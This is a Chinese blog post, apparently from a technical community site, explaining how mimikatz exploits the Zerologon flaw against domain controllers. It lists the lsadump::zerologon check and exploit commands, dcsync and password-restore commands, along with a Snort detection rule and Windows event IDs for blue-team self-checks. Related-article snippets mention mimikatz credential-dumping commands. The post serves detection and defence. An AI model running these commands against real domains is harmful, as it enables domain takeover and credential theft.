域控服务器排查命令,mimikatz利用zerologon攻击域控服务器相关命令(附蓝队自查方案)...

最新推荐文章于 2024-05-27 09:14:56 发布
最新推荐文章于 2024-05-27 09:14:56 发布
阅读量662 收藏
点赞数
文章标签: 域控服务器排查命令

0x01 前言

mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix

官方利用截图如下

2550726ab1ce9108d260518d60291602.png

mimikatz相关命令

lsadump::zerologon /target:dc.hacke.testlab /account:dc$poc

lsadump::zerologon /target:dc.hacke.testlab /account:dc$ /exploit 通过zerologon漏洞攻击域控服务器

lsadump::dcsync

lsadump::postzerologon /target:conttosson.locl /account:dc$ #恢复密码

55bda7d8bf2feb65dd4aa5a0f064a411.png

snort 检测规则

alert tcp any any -> any ![139,445] (msg:"Possible Mimikatz Zerologon Attempt"; flow:established,to_server; content:"|00|"; offset:2; content:"|0f 00|"; distance:22; within:2; fast_pattern; content:"|00 00 00 00 00 00 00 00 ff ff 2f 21|"; within:90; reference:url,https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200916; classtype:attempted-admin; sid:20166330; rev:2; metadata:created_at 2020_09_19;)

pcap包

利用zerologon漏洞攻击域控的数据包,方便同学们写完规则做测试pcap github下载地址

windows事件管理器自查

在未打补丁的域控,重点查看windows事件管理器中,eventid为4742或者4624, 5805

在windows 8月更新中,新增事件ID 5829,5827,5828,5830,5831。蓝队可以重点关注这几个事件ID以方便自查

当在初始部署阶段允许存在漏洞的Netlogon安全通道连接时,将生成事件ID 5829。

管理员可以监控事件ID 5827和5828,这些事件ID在存在漏洞的Netlogon连接被拒绝时触发

5830,5831  如果“域控制器:允许易受攻击的Netlogon安全通道连接”组策略允许连接。

mimikatz通过zerologon攻击成功后,将会留下事件id为4648。

参考

How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc

Detecting the Zerologon vulnerability in LogPoint     https://www.logpoint.com/en/blog/detecting-zerologon-vulnerability-in-logpoint/

https://gist.githubusercontent.com/silence-is-best/435ddb388f872b1a2e332b6239e9150b/raw/8064d33f62d5983130d3d946aac28ea00aaf6c4a/gistfile1.txt

青亭网
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AD主域控紧急救援
白昼的技术专栏
05-06 1830
背景: 前段时间碰到一个博友求助一个问题:现有一个AD域控制器DC1,系统中毒,但AD域服务正常,为避免因系统崩溃而造成域控失效,怎么来救援? 解决思路: 创建一个临时的额外域控DC2,然后把主域控DC1卸载掉,这样DC2自动变成主域控,再将DC1重新系统后,将DC1创建额外域控加入现有域中,再卸载DC2域控。 解决步骤: 一、查看DC1主域控: 二、DC2创建额外域控: DC2的dns地址配置为DC1的IP: 添加AD和DNS角色(其他步骤省略): 添加角色后,将
域控场景下windows安全日志的分析--审计认证行为和命令的历史记录
weixin_30852451的博客
03-13 5158
一、域控windows安全日志基本操作 1、打开powershell或者cmd 1 #gpedit.msc 打开配置: 关于账户安全性的策略配置在账户配置哪里 2、打开控制面板->系统与安全->事件查看器->windows日志->安全: 希望这里配置的时间足够长久,以便于查看日志 选择筛选器,筛选这一条: 来查看这个是很常用的一个,当然审...
域控服务器排查命令,Mimikatz利用Zerologon攻击域控服务器相关命令附蓝队自查方案)...
weixin_39590989的博客
08-02 706
0x01 前言mimikatz 20200918版本支持通过zerologon漏洞攻击域控服务器。下载链接如下https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20200918-fix官方利用截图如下mimikatz相关命令lsadump::zerologon /target:dc.hacke.testlab /account:dc...
域提权漏洞系列分析-Zerologon漏洞分析
最新发布
hakksjss的博客
05-27 817
3.利⽤置零修改域控密码为空,这⼀步会把域控win-3o8g1o8vv2e(即win-3o8g1o8vv2e$⽤户)的密码置为空, hash为31d6cfe0d16ae931b73c59d7e0c089c0,回显两个OK显示成功把密码置零(如图6- 所示),因为机器⽤ 户是不可以登录系统的,但是域控的机器⽤户具备Dcsync特权,我们就可以滥⽤该特权来进⾏Dcsync攻击;图6- 获取域控服务器的机器账号。图6- 利⽤置零修改域控密码为空。图6- 探测域控是否存在该漏洞。
ZeroLogon(CVE-2020-1472) 漏洞的攻击与防御策略(上)
systemino的博客
10-27 3717
本文将从攻防角度对CVE-2020-1472进行一个简单的介绍,并对如何检测和修复ZeroLogon提出具体建议。 什么是ZeroLogon? Netlogon远程协议(也称为MS-NRPC)是一个远程进程调用(RPC)接口,仅由连接到域的设备使用。 MS-NRPC包括身份验证方法和建立Netlogon安全通道的方法。这些更新强制指定的Netlogon客户端行为,以便在成员计算机和Active Directory (AD)域控制器(DC)之间使用带有Netlogon安全通道的安全RPC。 Zero..
应急响应--windows主机入侵排查思路
weixin_55821558的博客
06-14 2368
在之前的工作和护网期间,工程师们在实施主机入侵入侵排查工作的时候,常常会面临时间紧、任务急,需要排查的主机数量众多的情况,为了确保实施人员在有限的时间范围内,可以高效且保证质量的前提下完成主机入侵排查工作。结合大佬们的叙述和自己的体会作如下总结,仅供参考。1.初步筛选排查资产一般情况下,客户资料都比较多,想要对所有的资产主机进行入侵痕迹排查基本不太现实,等我们全部都排查完了,攻击者该做的事早就做完了,想要的目的也早就达到了,所以我简单说一下我的思路:首先,在排查前,作为项目经理,应该和客户沟通好,取得授权,
Invoke-Mimikatz.ps1
01-06
Invoke-Mimikatz.ps1
测试工具mimikatz-windows版64位,32位。查看.dmp文件工具
06-05
需要以管理员身份运行的命令行,进入mimikatz.exe文件夹下,运行mimikatz.exe,(*需要测试的文件,需要和mimikatz.exe放在同一文件夹下) Mimikatz命令: **提升权限 命令:privilege::debug ** cls: 清屏 ...
mimikatz.zip附简单使用方法
08-01
mimikatz的使用需要administrator用户执行,administrators中的其他用户都不行。 注意该程序会被ban 提升权限 privilege::debug 抓取密码 sekurlsa::logonpasswords reg add HKLM\SYSTEM\CurrentControlSet\Control...
mimikatz.exe
09-28
获取windows密码
mimikatz.rar
07-08
同时,这一特性也使得mimikatz成为了一种潜在的安全威胁,因为恶意用户可以利用它窃取敏感信息。 除了密码获取,mimikatz还提供了多种其他功能。例如,它可以读取SAM(Security Account Manager)数据库,获取系统...
mimikatz.zip
01-17
mimikatz:深入解析Windows安全漏洞利用工具》 mimikatz,这是一个在网络安全领域备受关注的工具,尤其在渗透测试和恶意软件分析中扮演着重要角色。它的主要功能是提取Windows操作系统中的敏感信息,如明文密码、...
procdump32_64+mimikatz.rar
06-15
- **安全审计**:mimikatz用于检查系统凭证保护机制,确保没有容易被攻击利用的漏洞。 - **渗透测试**:在模拟攻击中,结合procdump和mimikatz可以模拟攻击者在系统崩溃前尝试获取敏感信息的行为。 - **应急响应**...
mimikatz_trunk.zip
08-10
mimikatz 2.2.0:深入解析与应用》 mimikatz,一个由法国安全研究员Benjamin Delpy开发的工具,以其强大的权限提升和密码提取功能在网络安全领域广受关注。标题提及的“mimikatz_trunk.zip”是该工具的一个特定...
procdump+mimikatz.zip
11-14
例如,当发现异常进程活动时,可以先使用procdump生成进程内存快照,然后利用mimikatz分析内存中的敏感信息,寻找可能存在的攻击痕迹。这种组合可以有效地帮助安全人员在不影响系统运行的情况下,快速定位并理解潜在...
go-mimikatz - Go语言版本的Mimikatz.zip
07-18
《Go语言实现的Mimikatz:go-mimikatz详解》 在网络安全领域,Mimikatz是一款著名的工具,用于获取Windows系统中的敏感信息,如明文密码、NTLM哈希、 Kerberos票证等。它由法国安全研究员Benjamin Delpy开发,为...
mimakatz用法_Mimikatz 使用小技巧
weixin_39722196的博客
12-20 748
1.记录 Mimikatz输出:C:>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir2.将输出导入到本地文件:C:>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" ...
Mimikatz使用方法
热门推荐
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
探秘ZeroLogon:Windows域控安全漏洞的克星
gitblog_00088的博客
04-04 506
探秘ZeroLogon:Windows域控安全漏洞的克星 项目地址:https://gitcode.com/Rvn0xsy/ZeroLogon 零日攻击Zero-Day)是网络安全领域的一种严重威胁,而ZeroLogon则是2020年发现的一个影响Windows域控制器的重大漏洞。本文将深入探讨ZeroLogon项目,这是一个开源工具,旨在帮助系统管理员检测并修复此漏洞。 项目简介 ZeroLo...
mimikatz.exe2.2
12-15
Mimikatz.exe 2.2可以在本地或远程访问的Windows系统上运行,并且可以通过多种方式进行执行,使得攻击者可以轻而易举地获取到系统中的敏感信息。这些信息包括但不限于用户名、密码、凭据、密钥等,对系统安全构成了...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值